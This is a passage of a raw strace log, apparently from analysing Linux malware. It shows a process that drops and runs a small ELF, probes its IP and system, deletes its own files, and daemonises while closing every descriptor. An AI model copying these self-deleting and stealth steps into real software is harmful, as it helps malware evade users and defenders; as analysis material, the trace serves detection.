  302. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360,\0\0\0\0\0\0"..., 832) = 832
  303. fstat(3, {st_mode=S_IFREG|0644, st_size=141784, ...}) = 0
  304. mmap(NULL, 2236904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7575000
  305. mprotect(0x7f57d7597000, 2093056, PROT_NONE) = 0
  306. mmap(0x7f57d7796000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x21000) = 0x7f57d7796000
  307. close(3)                                = 0
  308. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  309. open("/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY) = 3
  310. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360>\0\0\0\0\0\0"..., 832) = 832
  311. fstat(3, {st_mode=S_IFREG|0644, st_size=530736, ...}) = 0
  312. mmap(NULL, 2625768, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d72f3000
  313. mprotect(0x7f57d7374000, 2093056, PROT_NONE) = 0
  314. mmap(0x7f57d7573000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x80000) = 0x7f57d7573000
  315. close(3)                                = 0
  316. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a8000
  317. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a7000
  318. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a6000
  319. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a4000
  320. arch_prctl(ARCH_SET_FS, 0x7f57db0a4720) = 0
  321. mprotect(0x7f57d7573000, 4096, PROT_READ) = 0
  322. mprotect(0x7f57d7796000, 4096, PROT_READ) = 0
  323. [...]
  324. mprotect(0x7f57db2df000, 4096, PROT_READ) = 0
  325. mprotect(0x7f57db0c1000, 4096, PROT_READ) = 0
  326. munmap(0x7f57db0b1000, 56122)           = 0
  327. set_tid_address(0x7f57db0a49f0)         = 18141
  328. set_robust_list(0x7f57db0a4a00, 0x18)   = 0
  329. futex(0x7fff5d64a5ac, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, 7f57db0a4720) = -1 EAGAIN (Resource temporarily unavailable)
  330. rt_sigaction(SIGRTMIN, {0x7f57d9407ad0, [], SA_RESTORER|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
  331. rt_sigaction(SIGRT_1, {0x7f57d9407b60, [], SA_RESTORER|SA_RESTART|SA_SIGINFO, 0x7f57d9411030}, NULL, 8) = 0
  332. rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0
  333. getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
  334. rt_sigaction(SIGINT, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  335. rt_sigaction(SIGTERM, {0x7f57d9a58950, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  336. rt_sigaction(SIGPIPE, {SIG_IGN, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  337. rt_sigaction(SIGHUP, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, NULL, 8) = 0
  338. rt_sigprocmask(SIG_BLOCK, [HUP INT TERM], NULL, 8) = 0
  339. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
  340. close(3)                                = 0
  341. socket(PF_INET6, SOCK_STREAM, IPPROTO_IP) = 3
  342. getsockname(3, {sa_family=AF_INET6, sin6_port=htons(0), inet_pton(AF_INET6, "::", &sin6_addr), sin6_flowinfo=0, sin6_scope_id=0}, [28]) = 0
  343. close(3)                                = 0
  344. socket(PF_FILE, SOCK_STREAM, 0)         = 3
  345. close(3)                                = 0
  346. futex(0x7f57d9c7f8ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  347. futex(0x7f57d9c7f744, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  348. brk(0)                                  = 0x7f57dd0d4000
  349. brk(0x7f57dd0f5000)                     = 0x7f57dd0f5000
  350. mmap(NULL, 266240, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db063000
  351. mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d6af2000
  352. mprotect(0x7f57d6af2000, 4096, PROT_NONE) = 0
  353. clone(Process 18146 attached
  354. child_stack=0x7f57d72f1fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d72f29d0, tls=0x7f57d72f2700, child_tidptr=0x7f57d72f29d0) = 18146
  355. [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d62f1000
  356. [pid 18141] mprotect(0x7f57d62f1000, 4096, PROT_NONE) = 0
  357. [pid 18141] clone(Process 18147 attached
  358. child_stack=0x7f57d6af0fd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d6af19d0, tls=0x7f57d6af1700, child_tidptr=0x7f57d6af19d0) = 18147
  359. [pid 18141] brk(0x7f57dd11a000)         = 0x7f57dd11a000
  360. [pid 18141] pipe([3, 5])                = 0
  361. [pid 18141] fcntl(3, F_GETFL)           = 0 (flags O_RDONLY)
  362. [pid 18141] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0
  363. [pid 18141] epoll_create(64)            = 6
  364. [pid 18141] epoll_ctl(6, EPOLL_CTL_ADD, 3, {EPOLLIN, {u32=3, u64=3}}) = 0
  365. [pid 18141] mmap(NULL, 8392704, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0x7f57d5af0000
  366. [pid 18141] mprotect(0x7f57d5af0000, 4096, PROT_NONE) = 0
  367. [pid 18141] clone(Process 18148 attached
  368. child_stack=0x7f57d62effd0, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0x7f57d62f09d0, tls=0x7f57d62f0700, child_tidptr=0x7f57d62f09d0) = 18148
  369. [pid 18147] set_robust_list(0x7f57d6af19e0, 0x18) = 0
  370. [pid 18147] futex(0x7f57db06a07c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
  371. [pid 18146] set_robust_list(0x7f57d72f29e0, 0x18) = 0
  372. [pid 18146] futex(0x7f57db06808c, FUTEX_WAIT_PRIVATE, 1, NULL <unfinished ...>
  373. [pid 18148] set_robust_list(0x7f57d62f09e0, 0x18) = 0
  374. [pid 18148] epoll_wait(6,  <unfinished ...>
  375. [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  376. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  377. [pid 18141] open("/usr/share/locale/C/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  378. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdst.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  379. [pid 18141] futex(0x7f57daa802c0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  380. [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  381. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  382. [pid 18141] open("/usr/share/locale/C/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  383. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libisc.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  384. [pid 18141] futex(0x7f57d9c7f6f0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  385. [pid 18141] futex(0x7f57d9c7f820, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  386. [pid 18141] futex(0x7f57daa802c4, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  387. [pid 18141] brk(0x7f57dd13b000)         = 0x7f57dd13b000
  388. [pid 18141] open("/usr/lib/ssl/openssl.cnf", O_RDONLY) = 7
  389. [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=10835, ...}) = 0
  390. [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  391. [pid 18141] read(7, "#\n# OpenSSL example configuratio"..., 4096) = 4096
  392. [pid 18141] read(7, "Netscape crash on BMPStrings or "..., 4096) = 4096
  393. [pid 18141] read(7, " this to avoid interpreting an e"..., 4096) = 2643
  394. [pid 18141] read(7, "", 4096)           = 0
  395. [pid 18141] close(7)                    = 0
  396. [pid 18141] munmap(0x7f57db0be000, 4096) = 0
  397. [pid 18141] futex(0x7f57d9a250ec, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  398. [pid 18141] open("/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so", O_RDONLY) = 7
  399. [pid 18141] read(7, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320[\0\0\0\0\0\0"..., 832) = 832
  400. [pid 18141] fstat(7, {st_mode=S_IFREG|0644, st_size=93208, ...}) = 0
  401. [pid 18141] mmap(NULL, 2188288, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 7, 0) = 0x7f57d58d9000
  402. [pid 18141] mprotect(0x7f57d58ed000, 2097152, PROT_NONE) = 0
  403. [pid 18141] mmap(0x7f57d5aed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 7, 0x14000) = 0x7f57d5aed000
  404. [pid 18141] close(7)                    = 0
  405. [pid 18141] mprotect(0x7f57d5aed000, 4096, PROT_READ) = 0
  406. [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  407. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  408. [pid 18141] open("/usr/share/locale/C/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  409. [pid 18141] open("/usr/share/locale/C/LC_MESSAGES/libdns.cat", O_RDONLY) = -1 ENOENT (No such file or directory)
  410. [pid 18141] futex(0x7f57daa7f8cc, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  411. [pid 18141] futex(0x7f57daa7f9d0, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  412. [pid 18141] write(2, "Usage: host [-aCdlriTwv] [-c cla"..., 924Usage: host [-aCdlriTwv] [-c class] [-N ndots] [-t type] [-W time]
  413.             [-R number] [-m flag] hostname [server]
  414. [...]
  415. ) = 924
  416. [pid 18141] time(NULL)                  = 1407227107
  417. [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
  418. [pid 18141] lstat("/home/mmd/0x02E/009/atom-aggregator-64.so", {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
  419. [pid 18141] getcwd("/home/mmd/0x02E/009", 4096) = 20
  420. [pid 18141] open("/home/mmd/0x02E/009/1.18141", O_WRONLY|O_CREAT|O_TRUNC, 0777) = 7
  421. [pid 18141] write(7, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0`\200\4\0104\0\0\0"..., 106) = 106
  422. [pid 18141] close(7)                    = 0
  423. [pid 18141] clone(Process 18150 attached
  424. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18150
  425. [pid 18141] wait4(-1, Process 18141 suspended
  426.  <unfinished ...>
  427. [pid 18150] execve("/home/mmd/0x02E/009/1.18141", ["/home/mmd/0x02E/009/1.18141"], [/* 20 vars */]) = 0
  428. [ Process PID=18150 runs in 32 bit mode. ]
  429. [pid 18150] _exit(99)                   = ?
  430. Process 18141 resumed
  431. Process 18150 detached
  432. [pid 18141] <... chroot resumed> )      = 18150
  433. [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
  434. [ Process PID=18141 runs in 64 bit mode. ]
  435. [pid 18141] unlink("/home/mmd/0x02E/009/1.18141") = 0
  436. [pid 18141] socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 7
  437. [pid 18141] connect(7, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
  438. [pid 18141] getsockname(7, {sa_family=AF_INET, sin_port=htons(55006), sin_addr=inet_addr("78.46.37.69")}, [16]) = 0
  439. [pid 18141] geteuid()                   = 1015
  440. [pid 18141] pipe2([9, 10], O_CLOEXEC)   = 0
  441. [pid 18141] clone(Process 18151 attached
  442. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18151
  443. [pid 18141] close(10)                   = 0
  444. [pid 18141] fcntl(9, F_SETFD, 0)        = 0
  445. [pid 18141] fstat(9, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
  446. [pid 18141] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  447. [pid 18141] read(9,  <unfinished ...>
  448. [pid 18151] close(9)                    = 0
  449. [pid 18151] dup2(10, 1)                 = 1
  450. [pid 18151] close(10)                   = 0
  451. [pid 18151] execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
  452. [pid 18151] brk(0)                      = 0xf3a000
  453. [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  454. [pid 18151] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a86000
  455. [pid 18151] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
  456. [pid 18151] open("/etc/ld.so.cache", O_RDONLY) = 9
  457. [pid 18151] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  458. [pid 18151] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7f9096a78000
  459. [pid 18151] close(9)                    = 0
  460. [pid 18151] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  461. [pid 18151] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
  462. [pid 18151] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  463. [pid 18151] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  464. [pid 18151] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7f90964de000
  465. [pid 18151] mprotect(0x7f9096660000, 2093056, PROT_NONE) = 0
  466. [pid 18151] mmap(0x7f909685f000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7f909685f000
  467. [pid 18151] mmap(0x7f9096864000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f9096864000
  468. [pid 18151] close(9)                    = 0
  469. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a77000
  470. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a76000
  471. [pid 18151] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f9096a75000
  472. [pid 18151] arch_prctl(ARCH_SET_FS, 0x7f9096a76700) = 0
  473. [pid 18151] mprotect(0x7f909685f000, 16384, PROT_READ) = 0
  474. [pid 18151] mprotect(0x7f9096a88000, 4096, PROT_READ) = 0
  475. [pid 18151] munmap(0x7f9096a78000, 56122) = 0
  476. [pid 18151] getpid()                    = 18151
  477. [pid 18151] rt_sigaction(SIGCHLD, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  478. [pid 18151] geteuid()                   = 1015
  479. [pid 18151] brk(0)                      = 0xf3a000
  480. [pid 18151] brk(0xf5b000)               = 0xf5b000
  481. [pid 18151] getppid()                   = 18141
  482. [pid 18151] stat("/home/mmd/0x02E/009", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
  483. [pid 18151] stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
  484. [pid 18151] rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
  485. [pid 18151] rt_sigaction(SIGINT, {0x40f270, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  486. [pid 18151] rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
  487. [pid 18151] rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  488. [pid 18151] rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
  489. [pid 18151] rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7f90965105c0}, NULL, 8) = 0
  490. [pid 18151] clone(Process 18152 attached
  491. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f9096a769d0) = 18152
  492. [pid 18151] wait4(-1,  <unfinished ...>
  493. [pid 18152] execve("/bin/uname", ["/bin/uname", "-a"], [/* 19 vars */]) = 0
  494. [pid 18152] brk(0)                      = 0xef7000
  495. [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  496. [pid 18152] mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac571000
  497. [pid 18152] access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
  498. [pid 18152] open("/etc/ld.so.cache", O_RDONLY) = 9
  499. [pid 18152] fstat(9, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  500. [pid 18152] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 9, 0) = 0x7ffeac563000
  501. [pid 18152] close(9)                    = 0
  502. [pid 18152] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  503. [pid 18152] open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 9
  504. [pid 18152] read(9, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  505. [pid 18152] fstat(9, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  506. [pid 18152] mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 9, 0) = 0x7ffeabfc9000
  507. [pid 18152] mprotect(0x7ffeac14b000, 2093056, PROT_NONE) = 0
  508. [pid 18152] mmap(0x7ffeac34a000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 9, 0x181000) = 0x7ffeac34a000
  509. [pid 18152] mmap(0x7ffeac34f000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffeac34f000
  510. [pid 18152] close(9)                    = 0
  511. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac562000
  512. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac561000
  513. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac560000
  514. [pid 18152] arch_prctl(ARCH_SET_FS, 0x7ffeac561700) = 0
  515. [pid 18152] mprotect(0x7ffeac34a000, 16384, PROT_READ) = 0
  516. [pid 18152] mprotect(0x606000, 4096, PROT_READ) = 0
  517. [pid 18152] mprotect(0x7ffeac573000, 4096, PROT_READ) = 0
  518. [pid 18152] munmap(0x7ffeac563000, 56122) = 0
  519. [pid 18152] brk(0)                      = 0xef7000
  520. [pid 18152] brk(0xf18000)               = 0xf18000
  521. [pid 18152] uname({sys="Linux", node="1x111", ...}) = 0
  522. [pid 18152] fstat(1, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
  523. [pid 18152] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffeac570000
  524. [pid 18152] write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73) = 73
  525. [pid 18141] <... read resumed> "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 4096) = 73
  526. [pid 18141] close(9)                    = 0
  527. [pid 18141] wait4(18151, Process 18141 suspended
  528.  <unfinished ...>
  529. [pid 18152] close(1)                    = 0
  530. [pid 18152] munmap(0x7ffeac570000, 4096) = 0
  531. [pid 18152] close(2)                    = 0
  532. [pid 18152] exit_group(0)               = ?
  533. Process 18152 detached
  534. [pid 18151] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18152
  535. [pid 18151] --- SIGCHLD (Child exited) @ 0 (0) ---
  536. [pid 18151] rt_sigreturn(0x11)          = 18152
  537. [pid 18151] exit_group(0)               = ?
  538. Process 18141 resumed
  539. Process 18151 detached
  540. [pid 18141] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 18151
  541. [pid 18141] --- SIGCHLD (Child exited) @ 0 (0) ---
  542. [pid 18141] munmap(0x7f57db0be000, 4096) = 0
  543. [pid 18141] unlink("/home/mmd/0x02E/009/atom-aggregator-64.so") = 0
  544. [pid 18141] open(".cache", O_RDWR)      = -1 ENOENT (No such file or directory)
  545. [pid 18141] unlink(".cache")            = -1 ENOENT (No such file or directory)
  546. [pid 18141] open(".cache", O_RDWR|O_CREAT|O_TRUNC, 0666) = 9
  547. [pid 18141] ftruncate(9, 12582912)      = 0
  548. [pid 18141] mmap(NULL, 12582912, PROT_READ|PROT_WRITE, MAP_SHARED, 9, 0) = 0x7f57d4cd9000
  549. [pid 18141] rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_IGN, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
  550. [pid 18141] rt_sigaction(SIGCHLD, {SIG_IGN, [CHLD], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  551. [pid 18141] rt_sigaction(SIGTSTP, {0x7f57dac9a0b4, [TSTP], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  552. [pid 18141] rt_sigaction(SIGINT, {0x7f57dac9a0b4, [INT], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {0x7f57d9a58950, ~[KILL STOP RTMIN RT_1], SA_RESTORER, 0x7f57d9411030}, 8) = 0
  553. [pid 18141] rt_sigaction(SIGTTOU, {SIG_IGN, [TTOU], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  554. [pid 18141] rt_sigaction(SIGTTIN, {SIG_IGN, [TTIN], SA_RESTORER|SA_RESTART, 0x7f57d8d495c0}, {SIG_DFL, [], 0}, 8) = 0
  555. [pid 18141] clone(Process 18153 attached
  556. child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f57db0a49f0) = 18153
  557. [pid 18141] exit_group(0)               = ?
  558. Process 18141 attached (waiting for parent)
  559. [pid 18153] umask(0)                    = 022
  560. [pid 18153] setsid()                    = 18153
  561. [pid 18153] chroot("/")                 = -1 EPERM (Operation not permitted)
  562. [pid 18153] close(0)                    = 0
  563. [pid 18153] close(1)                    = 0
  564. [pid 18153] close(2)                    = 0
  565. [pid 18153] close(3)                    = 0
  566. [pid 18153] close(4)                    = 0
  567. [pid 18153] close(5)                    = 0
  568. [pid 18153] close(6)                    = 0
  569. [pid 18153] close(7)                    = 0
  570. [pid 18153] close(8)                    = 0
  571. [pid 18153] close(9)                    = 0
  572. [pid 18153] close(10)                   = -1 EBADF (Bad file descriptor)
  573. [pid 18153] close(11)                   = -1 EBADF (Bad file descriptor)
  574. [pid 18153] close(12)                   = -1 EBADF (Bad file descriptor)
  575.                [...]
  576. [pid 18153] close(1019)                 = -1 EBADF (Bad file descriptor)
  577. [pid 18153] close(1020)                 = -1 EBADF (Bad file descriptor)
  578. [pid 18153] close(1021)                 = -1 EBADF (Bad file descriptor)
  579. [pid 18153] close(1022)                 = -1 EBADF (Bad file descriptor)
  580. [pid 18153] close(1023)                 = -1 EBADF (Bad file descriptor)
  581. [pid 18153] open("/dev/null", O_RDONLY) = 0
  582. [pid 18153] open("/dev/null", O_RDONLY) = 1
  583. [pid 18153] open("/dev/null", O_RDONLY) = 2
  584. [pid 18153] open("/dev/null", O_RDONLY) = 3
  585. [pid 18153] time(NULL)                  = 1407227107
  586. [pid 18153] socket(PF_NETLINK, SOCK_RAW, 0) = 4
  587. [pid 18153] bind(4, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 0
  588. [pid 18153] getsockname(4, {sa_family=AF_NETLINK, pid=18153, groups=00000000}, [12]) = 0
  589. [pid 18153] time(NULL)                  = 1407227107
  590. [pid 18153] sendto(4, "\24\0\0\0\26\0\1\3\343\224\340S\0\0\0\0\0\0\0\0", 20, 0, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 20
  591. [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"0\0\0\0\24\0\2\0\343\224\340S\351F\0\0\2\10\200\376\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 108
  592. [pid 18153] recvmsg(4, {msg_name(12)={sa_family=AF_NETLINK, pid=0, groups=00000000}, msg_iov(1)=[{"\24\0\0\0\3\0\2\0\343\224\340S\351F\0\0\0\0\0\0\1\0\0\0\10\0\1\0\177\0\0\1"..., 4096}], msg_controllen=0, msg_flags=0}, 0) = 20
  593. [pid 18153] close(4)                    = 0
  594. [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
  595. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  596. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  597. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
  598. [pid 18153] read(4, "", 4096)           = 0
  599. [pid 18153] close(4)                    = 0
  600. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  601. [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
  602. [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
  603. [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
  604. [pid 18153] close(4)                    = 0
  605. [pid 18153] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 4
  606. [pid 18153] connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
  607. [pid 18153] close(4)                    = 0
  608. [pid 18153] open("/etc/nsswitch.conf", O_RDONLY) = 4
  609. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
  610. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
